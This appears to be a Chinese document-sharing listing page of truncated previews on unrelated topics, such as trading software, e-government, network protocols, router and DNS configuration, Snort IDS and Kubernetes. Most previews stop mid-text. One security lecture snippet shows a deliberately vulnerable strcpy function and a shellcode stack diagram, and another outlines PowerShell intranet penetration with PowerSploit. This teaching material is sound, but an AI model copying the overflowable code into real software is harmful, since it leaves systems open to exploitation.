一、 网 上 交 易 客 户 端 操 作 文 档 证 券 2014 年 免 责 申 明 因 客 户 端 软 件 升 级, 对 应 帮 助 文 件 中 的 图 片 及 文 字 可 能 存 在 未 同 步 更 新 的 情 况, 由 此 产 生 的 损 失 我 们 将 不 负 任 何 责 任, 请 大 家 以 最 新 版 本 的 客 户 端 软 件 为 准 索 引 一 委 托 功 能 区 说 明...1 二 委

More information

标题

标题 . 4 2013 年 湖 南 省 财 政 厅 电 子 政 务 发 展 形 势 分 析 及 2014 年 发 展 展 望 湖 南 省 财 政 厅 2013 年, 省 财 政 厅 高 度 重 视 电 子 政 务 工 作, 将 电 子 政 务 作 为 优 化 工 作 流 程 提 高 工 作 效 率 提 升 服 务 水 平 建 设 透 明 廉 洁 财 政 的 重 要 途 径, 信 息 化 水 平 不 断 提

More information

目 录(目录名)

目  录(目录名) 目录 1 域名解析配置命令... 1-1 1.1 域名解析配置命令...1-1 1.1.1 display dns domain... 1-1 1.1.2 display dns dynamic-host... 1-2 1.1.3 display dns proxy table... 1-2 1.1.4 display dns server... 1-3 1.1.5 display ip host...

More information

<4D6963726F736F667420576F7264202D20CDB6D7CAD5DFB1A3BBA4B5E4D0CDB0B8C0FDA3A831322D3234A3A9>

<4D6963726F736F667420576F7264202D20CDB6D7CAD5DFB1A3BBA4B5E4D0CDB0B8C0FDA3A831322D3234A3A9> 案 例 12 信 披 错 漏 引 震 荡 规 范 披 露 保 公 平 为 顺 应 某 市 政 府 城 市 中 心 区 退 二 进 三 整 体 规 划 的 需 要,B 上 市 公 司 将 位 于 城 市 中 心 区 域 的 旧 厂 区 生 产 线 逐 步 搬 迁 到 市 郊 和 省 外 开 发 区 2012 年 7 月, 公 司 在 完 成 旧 厂 区 的 搬 迁 后, 与 土 地 管 理 部 门 签

More information

ARP ICMP

ARP ICMP ARP ICMP 2 9-1 ARP 9-2 ARP 9-3 ARP 9-4 ICMP 9-5 ICMP 9-6 ICMP 9-7 ICMP 3 ARP ICMP TCP / IP, IP ARP ICMP 3 IP, ARP ICMP IP ARP ICMP 2, 4 9-1 ARP, MAC, IP IP, MAC ARP Address Resolution Protocol, OSI ARP,,

More information

第3章 计算机网络体系结构

第3章  计算机网络体系结构 第 3 章 计 算 机 网 络 体 系 结 构 本 章 内 容 计 算 机 的 网 络 体 系 结 构 网 络 参 考 模 型 五 层 网 络 参 考 模 型 1 3.1 计 算 机 网 络 体 系 结 构 发 展 历 程 分 层 原 理 基 本 概 念 2 发 展 历 程 网 络 体 系 结 构 提 出 的 背 景 计 算 机 网 络 的 复 杂 性 异 质 性 不 同 的 通 信 介 质 有 线

More information

TCP/IP TCP/IP OSI IP TCP IP IP TCP/IP TCP/IP

TCP/IP TCP/IP OSI IP TCP IP IP TCP/IP TCP/IP TCP/IP : TCP/IP TCP/IP OSI IP TCP IP IP TCP/IP TCP/IP 1. ASCII EBCDIC Extended Binary-Coded Decimal Interchange Code 2. / (1) (2) Single System Image SSI) (3) I/O (4) 3.OSI OSI Open System Interconnection

More information

Windows RTEMS 1 Danilliu MMI TCP/IP QEMU i386 QEMU ARM POWERPC i386 IPC PC104 uc/os-ii uc/os MMI TCP/IP i386 PORT Linux ecos Linux ecos ecos eco

Windows RTEMS 1 Danilliu MMI TCP/IP QEMU i386 QEMU ARM POWERPC i386 IPC PC104 uc/os-ii uc/os MMI TCP/IP i386 PORT Linux ecos Linux ecos ecos eco Windows RTEMS 1 Danilliu MMI TCP/IP 80486 QEMU i386 QEMU ARM POWERPC i386 IPC PC104 uc/os-ii uc/os MMI TCP/IP i386 PORT Linux ecos Linux ecos ecos ecos Email www.rtems.com RTEMS ecos RTEMS RTEMS Windows

More information

1

1 1 2 3 4 5 GNUDebugger 6 7 void main(int argc, char **argv){ vulncpy(argv[1]); return; } void vulncpy(char *a){ char buf[30]; strcpy(buf, a); return; } *argv[1] buf Shellcode *argv[1]... &buf &buf 8 strcpy

More information

0 配置 Host MIB 设备 V ( 简体版 ) 0 Update: 2016/1/30

0 配置 Host MIB 设备 V ( 简体版 ) 0 Update: 2016/1/30 0 配置 Host MIB 设备 V 1.1.2 ( 简体版 ) 0 Update: 2016/1/30 前言 N-Reporter 支持 Host Resource MIB 监控主机 (Host) 状态, 本文件描述 N-Reporter 用户如何配置 Host MIB 设备 文件章节如下 : 1. 配置 Windows Server 2003... 2 1-1.Windows Server 2003

More information

ebook67-9

ebook67-9 9 IP 9.1 I P 9-1 I P 9-1 d a e m o n U n i x d a e m o n d a e m o n [Perlman 1992] 10 R I P Routing Information Protocol I P 9-1 I P 30 I C M P 9. 5 r o u t e n e t s t a t route netstat UDP TCP ICMP

More information

Kubenetes 系列列公开课 2 每周四晚 8 点档 1. Kubernetes 初探 2. 上 手 Kubernetes 3. Kubernetes 的资源调度 4. Kubernetes 的运 行行时 5. Kubernetes 的 网络管理理 6. Kubernetes 的存储管理理 7.

Kubenetes 系列列公开课 2 每周四晚 8 点档 1. Kubernetes 初探 2. 上 手 Kubernetes 3. Kubernetes 的资源调度 4. Kubernetes 的运 行行时 5. Kubernetes 的 网络管理理 6. Kubernetes 的存储管理理 7. Kubernetes 包管理理 工具 Helm 蔺礼强 Kubenetes 系列列公开课 2 每周四晚 8 点档 1. Kubernetes 初探 2. 上 手 Kubernetes 3. Kubernetes 的资源调度 4. Kubernetes 的运 行行时 5. Kubernetes 的 网络管理理 6. Kubernetes 的存储管理理 7. Kubernetes

More information

路由器基本配置

路由器基本配置 路由器基本配置 本章内容 路由器的基本操作 实验练习 常用的路由器配置方法 TFTP Console MODEM AUX telnet web 任何 Interface AUX 备份接口, 一般用于路由器的管理备份接口 路由器的操作模式 : 配置模式 1. 线路配置模式 Router(config-line)# 配置路由器的线路参数 2. 路由协议配置模式 Router(config-router)#

More information

中国科学院文件

中国科学院文件 中 国 科 学 院 西 安 光 学 精 密 机 械 研 究 所 文 件 西 光 网 字 2013 15 号 中 国 科 学 院 西 安 光 机 所 关 于 发 布 中 科 院 西 安 光 机 所 信 息 化 建 设 管 理 办 法 (2013 修 订 版 ) 的 通 知 所 属 各 部 门 各 控 股 公 司 : 为 促 进 西 安 光 机 所 信 息 化 建 设 发 展, 确 保 研 究 所 信

More information

获取 Access Token access_token 是接口的全局唯一票据, 接入方调用各接口时都需使用 access_token 开发者需要进行妥善保存 access_token 的存储至少要保留 512 个字符空间 access_token 的有效期目前为 2 个小时, 需定时刷新, 重复

获取 Access Token access_token 是接口的全局唯一票据, 接入方调用各接口时都需使用 access_token 开发者需要进行妥善保存 access_token 的存储至少要保留 512 个字符空间 access_token 的有效期目前为 2 个小时, 需定时刷新, 重复 获取 Access Token access_token 是接口的全局唯一票据, 接入方调用各接口时都需使用 access_token 开发者需要进行妥善保存 access_token 的存储至少要保留 512 个字符空间 access_token 的有效期目前为 2 个小时, 需定时刷新, 重复 获取将导致上次获取的 access_token 失效 接入方可以使用 AppID 和 AppSecret

More information

Office Office Office Microsoft Word Office Office Azure Office One Drive 2 app 3 : [5] 3, :, [6]; [5], ; [8], [1], ICTCLAS(Institute of Computing Tech

Office Office Office Microsoft Word Office Office Azure Office One Drive 2 app 3 : [5] 3, :, [6]; [5], ; [8], [1], ICTCLAS(Institute of Computing Tech - OfficeCoder 1 2 3 4 1,2,3,4 xingjiarong@mail.sdu.edu.cn 1 xuchongyang@mail.sdu.edu.cn 2 sun.mc@outlook.com 3 luoyuanhang@mail.sdu.edu.cn 4 Abstract. Microsoft Word 2013 Word 2013 Office Keywords:,, HTML5,

More information

11N 无线宽带路由器

11N 无线宽带路由器 http://www.tenda.com.cn 1... 1 1.1... 1 1.2... 1 2... 3 2.1... 3 2.2... 3 2.3... 5 2.4... 6 2.5... 7 2.6... 9 2.6.1 无线基本设置... 9 2.6.2 无线加密设置... 9 2.7... 10 3... 18 3.1... 18 3.2... 19 3.2.1 ADSL 拨号上网设置...

More information

工程师培训

工程师培训 .1 TCP/IP TCP/IP 1 .2.2.1 Host 1960 S 1970 S Host Low Speed Lines 1970 S 1980 S pc Server Local Interneting 1980 S 1990 S Branch. pc Branch. WAN Branch. pc pc IBM SNA IBM X.25 2 .2.2 OSI OSI Application

More information

手册 doc

手册 doc 1. 2. 3. 3.1 3.2 3.3 SD 3.4 3.5 SD 3.6 3.7 4. 4.1 4.2 4.3 SD 4.4 5. 5.1 5.2 5.3 SD 6. 1. 1~3 ( ) 320x240~704x288 66 (2G SD 320x2401FPS ) 32M~2G SD SD SD SD 24V DC 3W( ) -10~70 10~90% 154x44x144mm 2. DVR106

More information

untitled

untitled Lwip Swedish Institute of Computer Science February 20, 2001 Adam Dunkels adam@sics.se (QQ: 10205001) (QQ: 329147) (QQ:3232253) (QQ:3232253) QQ ARM TCPIP LCD10988210 LWIP TCP/IP LWIP LWIP lwip API lwip

More information

Symantec™ Sygate Enterprise Protection 防护代理安装使用指南

Symantec™ Sygate Enterprise Protection 防护代理安装使用指南 Symantec Sygate Enterprise Protection 防 护 代 理 安 装 使 用 指 南 5.1 版 版 权 信 息 Copyright 2005 Symantec Corporation. 2005 年 Symantec Corporation 版 权 所 有 All rights reserved. 保 留 所 有 权 利 Symantec Symantec 徽 标 Sygate

More information

SP_ SP_03 JAVA...6 SP_10 SQL...8 SP_ SP_ SP_ SP_ SP_ SP_ SP_ SP_04.NET...33 SP_02 C...37 SP_05

SP_ SP_03 JAVA...6 SP_10 SQL...8 SP_ SP_ SP_ SP_ SP_ SP_ SP_ SP_04.NET...33 SP_02 C...37 SP_05 1 SP_01...3 SP_03 JAVA...6 SP_10 SQL...8 SP_51...12 SP_32...15 SP_53...18 SP_20...21 SP_22...24 SP_21...27 SP_23...30 SP_04.NET...33 SP_02 C...37 SP_05 FLASH...39 SP_06...42 2 SP_01 1. 8. Excel 2. 9. PowerPoint

More information

TCPIP协议簇

TCPIP协议簇 学习沉淀成长分享 TCP/IP VLSM 红茶三杯 ( 朱 SIR) 微博 :http://t.sina.com/vinsoney Latest update: 2012-06-01 Content TCP/IP VLSM TCP IP 概述 DoD 模型 TCP UDP 协议概述 IP ARP 协议概述 TCP/IP 参考模型 应用层传输层网络层数据链路层物理层对等模型 应用层表示层会话层传输层网络层数据链路层物理层

More information

エスポラージュ株式会社 住所 : 東京都江東区大島 東急ドエルアルス大島 HP: ******************* * 关于 Java 测试试题 ******

エスポラージュ株式会社 住所 : 東京都江東区大島 東急ドエルアルス大島 HP:  ******************* * 关于 Java 测试试题 ****** ******************* * 关于 Java 测试试题 ******************* 問 1 运行下面的程序, 选出一个正确的运行结果 public class Sample { public static void main(string[] args) { int[] test = { 1, 2, 3, 4, 5 ; for(int i = 1 ; i System.out.print(test[i]);

More information

计算机网络编程

计算机网络编程 计算机网络编程 第 11 章 TCP 数据包的封装与发送 信息工程学院方徽星 fanghuixing@hotmail.com 大纲 设计目的 相关知识 例题分析 1. 设计目的 熟悉 TCP 包结构对于理解网络层次结构, 以及 TCP 协议与 IP 协议的关系有着重要意义 通过封装与发送一个标准的 TCP 数据包, 了解 TCP 包结构中各字段的含义与用途 深入理解传输层与下面各层的关系 2. 相关知识

More information

網路安全:理論與實務 第二版

網路安全:理論與實務 第二版 第 10 章 :Wireshark 封 包 分 析 軟 體 10-1 Wireshark 簡 介 10-2 Wireshark 的 安 裝 方 法 10-3 Wireshark 的 使 用 Wireshark 簡 介 - 發 展 歷 史 Wireshark (http://www.wireshark.org/) 是 一 個 開 放 原 始 碼 (open source software) 軟 體,

More information

第二章 系统初始化.doc

第二章 系统初始化.doc 第 2 章系统初始化 系统的初始化的工作有很多, 本章先介绍一些 Snort 在执行 OpenPcap 函数 打开用于截包的网卡之前的一些初始化工作, 如完成 Sock 初始化 检测引擎初 始化 命令行解析等工作 2.1 WinSock 初始化 在 Windows 平台下调用 Socket API 之前, 必须调用 WSAStartup 函数初始化 WinSocket 在主函数调用 init_winsock

More information

目录 1 IP 地址 IP 地址配置命令 display ip interface display ip interface brief ip address 1-5 i

目录 1 IP 地址 IP 地址配置命令 display ip interface display ip interface brief ip address 1-5 i 目录 1 IP 地址 1-1 1.1 IP 地址配置命令 1-1 1.1.1 display ip interface 1-1 1.1.2 display ip interface brief 1-3 1.1.3 ip address 1-5 i 1 IP 地址 1.1 IP 地址配置命令 1.1.1 display ip interface display ip interface 命令用来显示三层接口与

More information

ChinaBI企业会员服务- BI企业

ChinaBI企业会员服务- BI企业 商业智能 (BI) 开源工具 Pentaho BisDemo 介绍及操作说明 联系人 : 杜号权苏州百咨信息技术有限公司电话 : 0512-62861389 手机 :18616571230 QQ:37971343 E-mail:du.haoquan@bizintelsolutions.com 权限控制管理 : 权限控制管理包括 : 浏览权限和数据权限 ( 权限部分两个角色 :ceo,usa; 两个用户

More information

六域链联盟 SDChain-Matrix 节点搭建指南 2018/07/26 Version : 1.0.0

六域链联盟 SDChain-Matrix 节点搭建指南 2018/07/26 Version : 1.0.0 SDChain-Matrix 节点搭建指南 目录 1 环境要求... 3 2 软件下载... 4 3 安装部署... 4 3.1 部署可执行程序目录... 4 3.2 部署配置文件目录... 4 3.3 部署数据库文件目录... 4 3.4 部署日志文件目录... 4 3.5 部署依赖库文件目录... 4 4 配置参数... 5 5 启动运行... 7 5.1 普通模式启动... 7 5.2 加载启动模式...

More information

Microsoft PowerPoint - BECKHOFF技术_ADS通讯 [Compatibility Mode]

Microsoft PowerPoint - BECKHOFF技术_ADS通讯 [Compatibility Mode] 的架构 ADS 的通讯机制 ADS-Client Request -> Confirmation Indication

More information

ebook35-21

ebook35-21 21 Linux L i n u x 211 U N I X U N I X I / O F I F O U N I X I n t e r n e t s o c k e t () s o c k e t () send() r e c v ( read() w r i t e () send() r e c v () I n t e r n e t 212 Internet Internet S

More information

第一章 系统架构总概.doc

第一章 系统架构总概.doc 第 7 章数据包处理 所谓 公欲善其事, 必先利其器, 前面几章的内容, 都是 Snort 为了完成检测任务而做的事先准备工作, 系统在所有初始化工作完成之后, 就进入了数据包处理阶段, 数据包的处理, 指的是完成包截获 拆包 数据包预处理 数据包检测 检测输出等任务 7.1 InterfaceThread 主函数在末尾处调用 InterfaceThread 函数进入数据包的处理, 它的主要工作,

More information

<4D6963726F736F667420576F7264202D20C9CFBAA3CAD0BCC6CBE3BBFAB5C8BCB6BFBCCAD4C8FDBCB6BFBCCAD4B4F3B8D95FBDA8D2E9B8E55F5F303632352E646F63>

<4D6963726F736F667420576F7264202D20C9CFBAA3CAD0BCC6CBE3BBFAB5C8BCB6BFBCCAD4C8FDBCB6BFBCCAD4B4F3B8D95FBDA8D2E9B8E55F5F303632352E646F63> 上 海 市 高 等 学 校 计 算 机 等 级 考 试 ( 三 级 ) 考 试 大 纲 -- 建 议 稿 -- 2007-6-25 25 目 录 上 海 市 高 等 学 校 计 算 机 等 级 考 试 三 级 总 体 说 明 -----------------1 三 级 ( 计 算 机 系 统 与 网 络 技 术 ) 考 试 大 纲 ---------------------2 三 级 ( 管 理

More information

目录 1 IPv6 快速转发 IPv6 快速转发配置命令 display ipv6 fast-forwarding aging-time display ipv6 fast-forwarding cache ipv6 fas

目录 1 IPv6 快速转发 IPv6 快速转发配置命令 display ipv6 fast-forwarding aging-time display ipv6 fast-forwarding cache ipv6 fas 目录 1 IPv6 快速转发 1-1 1.1 IPv6 快速转发配置命令 1-1 1.1.1 display ipv6 fast-forwarding aging-time 1-1 1.1.2 display ipv6 fast-forwarding cache 1-1 1.1.3 ipv6 fast-forwarding aging-time 1-3 1.1.4 ipv6 fast-forwarding

More information

A9RBC8B.tmp

A9RBC8B.tmp CCIE A B 1B 255.255.255.0 255.255.255.224 002 A B 1 1A B 2A B ARP MAC 3A B 192.168.26.2 4A B ARP 003 Wireshark Windows Wireshark 1. http://www.wireshark.org/download.html B 2. Wireshark Capture Interfaces

More information

图 4.2 udpclient 项目解决方案 3. 客户机程序编码如下 : 程序 : udp 客户机程序 udpclient.cpp

图 4.2 udpclient 项目解决方案 3. 客户机程序编码如下 : 程序 : udp 客户机程序 udpclient.cpp 实验四 UDP 客户机和服务器设计 一 实验目的 1. 学习和理解 UDP 协议 ( 对照 TCP 协议 ) 2. 掌握 UDP 客户机与服务器程序的设计方法 3. 掌握 UDP 套接字创建方法, 掌握 sendto recvfrom 等函数用法 注意与 send recv 函数做对比性学习 二 实验内容 1. 完成发送和接收数据报的客户机设计 2. 完成接收和回送数据报的服务器设计 3.( 选做

More information

IP505SM_manual_cn.doc

IP505SM_manual_cn.doc IP505SM 1 Introduction 1...4...4...4...5 LAN...5...5...6...6...7 LED...7...7 2...9...9...9 3...11...11...12...12...12...14...18 LAN...19 DHCP...20...21 4 PC...22...22 Windows...22 TCP/IP -...22 TCP/IP

More information

R3105+ ADSL

R3105+ ADSL ... 1 1 1... 1 1 2... 1... 3 2 1... 3 2 2... 3 2 3... 5 2 4... 5 2 4 1... 5... 7 3 1... 7 3 2... 8 3 2 1... 8 3 2 2... 9 3 3... 12 3 3 1... 13 3 3 2 WAN... 16 3 3 3 LAN... 21 3 3 4 NAT... 22 3 3 5... 24

More information

Microsoft Word zw

Microsoft Word zw 第 1 章 Android 概述 学习目标 : Android Android Android Studio Android Android APK 1.1 1. 智能手机的定义 Smartphone 2. 智能手机的发展 1973 4 3 PC IBM 1994 IBM Simon PDA PDA Zaurus OS 1996 Nokia 9000 Communicator Nokia 9000

More information

嵌入式Linux块设备驱动开发解析

嵌入式Linux块设备驱动开发解析 The success's road 嵌 入 式 LINUX 网 络 驱 动 开 发 Copyright 2007-2008 Farsight. All rights reserved. 要 点 Linux 网 络 设 备 驱 动 程 序 概 述 计 算 机 网 络 概 述 skbuf 数 据 结 构 介 绍 Linux 网 络 设 备 驱 动 程 序 API 介 绍 Linux 网 络 设 备 驱

More information

1. 总 体 目 标 通 过 本 课 程 的 学 习, 使 学 生 掌 握 新 大 陆 物 联 网 统 安 装 部 署 传 感 信 息 采 集 二 维 码 识 读 RFID 读 写 Zigbee 组 网 串 口 通 信 RS485 总 线 等 知 识 和 物 联 网 实 训 设 备 的 安 装 部

1. 总 体 目 标 通 过 本 课 程 的 学 习, 使 学 生 掌 握 新 大 陆 物 联 网 统 安 装 部 署 传 感 信 息 采 集 二 维 码 识 读 RFID 读 写 Zigbee 组 网 串 口 通 信 RS485 总 线 等 知 识 和 物 联 网 实 训 设 备 的 安 装 部 学 期 项 目 : 物 联 网 系 统 综 合 设 计 课 程 标 准 ( 一 ) 基 本 信 息 适 用 对 象 : 普 高 三 年 制 电 子 信 息 类 专 业 学 生 修 定 时 间 :2015-03-08 课 程 代 码 :070521 二 级 学 院 : 信 息 工 程 学 院 学 分 :2 学 时 :30 学 时 合 作 企 业 : 中 国 科 学 院 深 圳 先 进 技 术 研 究

More information

C/C++ - 文件IO

C/C++ - 文件IO C/C++ IO Table of contents 1. 2. 3. 4. 1 C ASCII ASCII ASCII 2 10000 00100111 00010000 31H, 30H, 30H, 30H, 30H 1, 0, 0, 0, 0 ASCII 3 4 5 UNIX ANSI C 5 FILE FILE 6 stdio.h typedef struct { int level ;

More information

Chapter 5 TCP/IP Security WANG YANG

Chapter 5 TCP/IP Security WANG YANG Content 实验课 课外安排时间, 每周一次 (6~10 周 ) 内容 : 基于安全实验虚拟机, 进行信息搜集 程序安全 网络安全的实验练习, 内容主要参照 SEED 的实验大纲 自愿报名 发邮件到 wyang@njnet.edu.cn 截止时间 : 本周日 Chapter 5 TCP/IP Security WANG YANG wyang@njnet.edu.cn Content TCP/IP

More information

电信行业网上营业厅

电信行业网上营业厅 2015 年 浙 江 首 届 网 络 安 全 管 理 员 职 业 竞 赛 竞 赛 指 南 竞 赛 组 委 会 2015 年 6 月 30 日 1 / 12 目 录 1 竞 赛 类 型... 3 1.1. 个 人 赛... 3 1.2. 团 队 赛... 3 2 题 型 及 数 量... 4 2.1. 个 人 赛... 4 2.1.1 个 人 初 赛... 4 2.1.2 个 人 决 赛... 4 2.2.

More information

Microsoft PowerPoint - 数据通信-ch1.ppt

Microsoft PowerPoint - 数据通信-ch1.ppt 主 要 内 容 与 基 本 要 求 主 要 内 容 数 据 通 信 与 计 算 机 网 络 计 算 机 网 络 的 发 展 过 程 分 类 以 及 主 要 性 能 指 标 ; 分 组 交 换 的 基 本 原 理 及 其 与 电 路 交 换 报 文 交 换 的 联 系 与 区 别 ; 计 算 机 网 络 的 协 议 与 体 系 结 构 第 1 章 概 述 基 本 要 求 掌 握 分 组 交 换 电 路

More information

<4D6963726F736F667420506F776572506F696E74202D20A1B6CFEEC4BFD2BB20B3F5CAB6BCC6CBE3BBFACDF8C2E7A1B7C8CECEF1C8FD20CAECCFA4544350A1A24950D0ADD2E9BACD4950B5D8D6B72E707074>

<4D6963726F736F667420506F776572506F696E74202D20A1B6CFEEC4BFD2BB20B3F5CAB6BCC6CBE3BBFACDF8C2E7A1B7C8CECEF1C8FD20CAECCFA4544350A1A24950D0ADD2E9BACD4950B5D8D6B72E707074> 项 目 一 : 初 识 计 算 机 网 络 任 务 三 熟 悉 TCP/IP 协 议 和 IP 地 址 一. 学 习 要 求 : 学 习 要 求 及 难 点 1. 了 解 IP 协 议 TCP 协 议 和 UDP 协 议 2. 熟 悉 IP 地 址 的 划 分 和 分 类 3. 了 解 IPV6 的 地 址 结 构 二. 难 点 : 1. IP 地 址 三. 学 时 : 1. 理 论 教 学 :6

More information

C3_ppt.PDF

C3_ppt.PDF C03-101 1 , 2 (Packet-filtering Firewall) (stateful Inspection Firewall) (Proxy) (Circuit Level gateway) (application-level gateway) (Hybrid Firewall) 2 IP TCP 10.0.0.x TCP Any High Any 80 80 10.0.0.x

More information

飞鱼星多WAN防火墙路由器用户手册

飞鱼星多WAN防火墙路由器用户手册 WAN VER: 20110218 Copyright 2002-2011 VOLANS WAN VR4600 VR4900 VR7200 VR7500 VR7600 1.1 1.2 IP 1.3 2.1 2.2 2.2.1 2.2.2 3.1 3.2 3.2.1 3.2.2 3.2.3 4.1 4.2 4.2.1 4.2.2 4.2.3 4.2.4 4.2.5 4.2.6 4.3 4.3.1 4.3.2

More information

第 1 章 概 述 1.1 计 算 机 网 络 在 信 息 时 代 中 的 作 用 1.2 计 算 机 网 络 的 发 展 过 程 *1.2.1 分 组 交 换 的 产 生 *1.2.2 因 特 网 时 代 *1.2.3 关 于 因 特 网 的 标 准 化 工 作 1.2.4 计 算 机 网 络 在

第 1 章 概 述 1.1 计 算 机 网 络 在 信 息 时 代 中 的 作 用 1.2 计 算 机 网 络 的 发 展 过 程 *1.2.1 分 组 交 换 的 产 生 *1.2.2 因 特 网 时 代 *1.2.3 关 于 因 特 网 的 标 准 化 工 作 1.2.4 计 算 机 网 络 在 计 算 机 网 络 ( 第 4 版 ) 课 件 第 1 章 计 算 机 网 络 概 述 郭 庆 北 Ise_guoqb@ujn.edu.cn 2009-02-25 第 1 章 概 述 1.1 计 算 机 网 络 在 信 息 时 代 中 的 作 用 1.2 计 算 机 网 络 的 发 展 过 程 *1.2.1 分 组 交 换 的 产 生 *1.2.2 因 特 网 时 代 *1.2.3 关 于 因 特

More information

幻灯片 1

幻灯片 1 项目介绍 数字资源访问系统建设与研究 以南京晓庄学院图书馆为例 陆康 2015-07-07 目录 1. 研究背景 2. 研究目的及目标 3. 研究思路及方法 4. 系统技术原理 5. 系统功能演示 6. 系统存在问题 1. 研究背景 随着互联网技术的不断进步, 高校图书馆资源呈现多元化发展趋势 高校图书馆数字资源建设经费占总资源的比例逐年提高, 平均值已经达到 50% 左右 数字资源读者利用率一直是图书馆决策者们所关注的问题之一

More information

《C语言基础入门》课程教学大纲

《C语言基础入门》课程教学大纲 C 语 言 开 发 入 门 教 程 课 程 教 学 大 纲 课 程 编 号 :201409210011 学 分 :5 学 分 学 时 :58 学 时 ( 其 中 : 讲 课 学 时 :39 学 时 上 机 学 时 :19 学 时 ) 先 修 课 程 : 计 算 机 导 论 后 续 课 程 :C++ 程 序 设 计 适 用 专 业 : 信 息 及 其 计 算 机 相 关 专 业 开 课 部 门 : 计

More information

NOWOER.OM m/n m/=n m/n m%=n m%n m%=n m%n m/=n 4. enum string x1, x2, x3=10, x4, x5, x; 函数外部问 x 等于什么? 随机值 5. unsigned char *p1; unsigned long *p

NOWOER.OM m/n m/=n m/n m%=n m%n m%=n m%n m/=n 4. enum string x1, x2, x3=10, x4, x5, x; 函数外部问 x 等于什么? 随机值 5. unsigned char *p1; unsigned long *p NOWOER.OM /++ 程师能 评估. 单项选择题 1. 下 描述正确的是 int *p1 = new int[10]; int *p2 = new int[10](); p1 和 p2 申请的空间 的值都是随机值 p1 和 p2 申请的空间 的值都已经初始化 p1 申请的空间 的值是随机值,p2 申请的空间 的值已经初始化 p1 申请的空间 的值已经初始化,p2 申请的空间 的值是随机值 2.

More information

untitled

untitled 1....2...2...6 2....10 3. UDP...15 4. TCP...16...16...16 1 1. PC COM1 COM2 COM1 COM2 DTU 2 3 4 COM1 COM1 COM2 COM ID 13900000000 DTU COM1 5 COM2 DTU DTU DTU DTU DTU DTU DTU ID ID 3031 3032 2 ID 13900000001

More information

目录 1. POWERSHELL 简介 2. POWERSPLOIT 3. 内网渗透实例 2

目录 1. POWERSHELL 简介 2. POWERSPLOIT 3. 内网渗透实例 2 POWERSHELL 内网渗透实例 WhiteCellClub 创始人 白细胞安全团队负责人 light 2015/09/07 1 目录 1. POWERSHELL 简介 2. POWERSPLOIT 3. 内网渗透实例 2 POWERSHELL 简介 3 powershell 简介 Powershell 是运行在 windows 上实现系统和应用程序管理自动化的命令行脚本 环境 你可以把它看成是命令行提示符

More information

18 上 报 该 学 期 新 生 数 据 至 阳 光 平 台 第 一 学 期 第 四 周 至 第 六 周 19 督 促 学 习 中 心 提 交 新 增 专 业 申 请 第 一 学 期 第 四 周 至 第 八 周 20 编 制 全 国 网 络 统 考 十 二 月 批 次 考 前 模 拟 题 第 一 学

18 上 报 该 学 期 新 生 数 据 至 阳 光 平 台 第 一 学 期 第 四 周 至 第 六 周 19 督 促 学 习 中 心 提 交 新 增 专 业 申 请 第 一 学 期 第 四 周 至 第 八 周 20 编 制 全 国 网 络 统 考 十 二 月 批 次 考 前 模 拟 题 第 一 学 1 安 排 组 织 全 国 网 络 统 考 九 月 批 次 网 上 考 前 辅 导 第 一 学 期 第 一 周 统 考 考 前 半 个 月 2 下 发 全 国 网 络 统 考 九 月 批 次 准 考 证 第 一 学 期 第 一 周 导 出 下 半 年 成 人 本 科 学 士 学 位 英 语 统 一 考 试 报 考 3 信 息 第 一 学 期 第 一 周 4 教 学 计 划 和 考 试 计 划 上 网,

More information

幻灯片 1

幻灯片 1 信息系统安全理论与技术 课程主要内容 第一篇网络安全基础知识 第二篇网络安全体系结构 第三篇网络安全技术 第四篇网络安全工程 第三篇网络安全技术 8 防火墙技术 9 入侵检测 10 漏洞扫描 11 黑客技术 12 网络隔离技术 13 病毒防范技术 第 9 章入侵检测 (IDS) 本章主要重点 : 截获网络上的数据包 监听数据包的技术 Libpcap WinPcap 入侵检测技术 9.1 网络监听 在一个共享式网络,

More information

<433A5C446F63756D656E747320616E642053657474696E67735C41646D696E6973747261746F725CD7C0C3E65CC2DBCEC4CFB5CDB3CAB9D3C3D6B8C4CFA3A8BCF2BBAFA3A95CCAB9D3C3D6B8C4CF31302D31392E646F63>

<433A5C446F63756D656E747320616E642053657474696E67735C41646D696E6973747261746F725CD7C0C3E65CC2DBCEC4CFB5CDB3CAB9D3C3D6B8C4CFA3A8BCF2BBAFA3A95CCAB9D3C3D6B8C4CF31302D31392E646F63> ( 一 ) 系 统 整 体 操 作 流 程 简 述 3 ( 二 ) 系 统 中 各 角 色 操 作 功 能 说 明 5 1. 学 院 管 理 员 5 2. 教 学 院 长 8 3. 指 导 教 师 10 4. 答 辩 组 组 长 12 5. 学 生 12 6. 系 统 管 理 员 15 ( 一 ) 论 文 系 统 常 见 问 题 16 ( 二 ) 论 文 查 重 常 见 问 题 22 1 2 主

More information

C 1

C 1 C homepage: xpzhangme 2018 5 30 C 1 C min(x, y) double C // min c # include # include double min ( double x, double y); int main ( int argc, char * argv []) { double x, y; if( argc!=

More information

01

01 Zebra Technologies 通过按需打印智能 ID 卡控制门禁并保护资产 摘要 / ID 简介 企业安全风险与日俱增 30% (NRF) 1.75% 750000 2.5 6500 2007 17500 2 Zebra Technologies 智能门禁卡的概念与工作原理 门禁安全应用 ID NRF 50% ID RFID 门禁 访客 ID ID POD Web VOID 跟踪员工以提升安全性

More information

PIC_SERVER (11) SMTP ( ) ( ) PIC_SERVER (10) SMTP PIC_SERVER (event driven) PIC_SERVER SMTP 1. E-

PIC_SERVER (11) SMTP  ( ) ( ) PIC_SERVER (10) SMTP  PIC_SERVER (event driven)  PIC_SERVER SMTP  1.  E- (2005-02-01) (2005-04-28) PIC_SERVER (10) SMTP E-mail PIC_SERVER (event driven) E-mail PIC_SERVER SMTP E-mail 1. E-mail E-mail 1 (1) (2) (3) (4) 1 1. 2 E-mail A E-mail B E-mail SMTP(Simple Mail Transfer

More information

CC213

CC213 : (Ken-Yi Lee), E-mail: feis.tw@gmail.com 49 [P.51] C/C++ [P.52] [P.53] [P.55] (int) [P.57] (float/double) [P.58] printf scanf [P.59] [P.61] ( / ) [P.62] (char) [P.65] : +-*/% [P.67] : = [P.68] : ,

More information

/3/15 1, linux. linux,,. : 1.NAT ; 2. (load balance, virtual server);; 3. ; 4. ; 5. 6.VPN; 7. ; 8. ; 9.. (,

/3/15 1, linux. linux,,. : 1.NAT ; 2. (load balance, virtual server);; 3. ; 4. ; 5. 6.VPN; 7. ; 8. ; 9.. (, Yawl(yawl@docshownet) wwwdocshownet 2000/3/15 1, linux linux,, 1NAT ; 2 (load balance,virtual server);; 3 ; 4 ; 5 6VPN; 7 ; 8 ; 9 (,, )IP, (VPN,, ) IP, (call_in_firewall(),call_fw_firewall(),call_out_firewall(),

More information

